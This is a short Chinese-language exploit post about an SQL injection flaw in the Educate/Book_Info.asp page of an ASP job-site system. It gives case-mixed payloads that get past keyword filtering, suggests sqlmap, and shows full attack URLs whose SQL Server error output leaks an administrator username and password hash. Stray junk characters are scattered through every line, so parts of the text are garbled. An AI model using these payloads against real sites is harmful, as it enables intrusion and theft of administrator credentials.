漏洞出现在Educate/Book_Info.asp, O6 g2 Y4 v3 Z) Y4 \! s0 U3 A3 k
此处注入点虽然过滤了一些关键字 但是我们还是可以盲注的 可以利用sqlmap跑出3 |4 Q2 B: v0 v3 F+ J. r
exp:如下
, J) N5 `* |& b查询管理账号:+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)
q5 P9 F+ Z3 o; v查询管理密码:+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)# |/ K, F* M; \0 T- }' e
http://jobs.0day5.com/Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)9 ~" ]4 Z9 ]* {% P- f" N- X1 @
Microsoft OLE DB Provider for SQL Server 错误 '80040e07'
9 V$ x* h+ m. @5 ?- h* ?将 nvarchar 值 'hackbase' 转换为数据类型为 int 的列时发生语法错误。
! x' d P! ~% q, F" n8 z/Educate/Book_Info.asp,行 8/ M. {- W9 n. R. _) u6 c
http://jobs.0day5.com/Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)
- {# l0 m; A( ~Microsoft OLE DB Provider for SQL Server 错误 '80040e07'
5 q4 b) T8 h# {* S: z* o) h将 nvarchar 值 '165706AD8319D7F95B7FC5E82FBE8F' 转换为数据类型为 int 的列时发生语法错误。' Y( G# y# q% c+ {1 \
/Educate/Book_Info.asp,行 8 |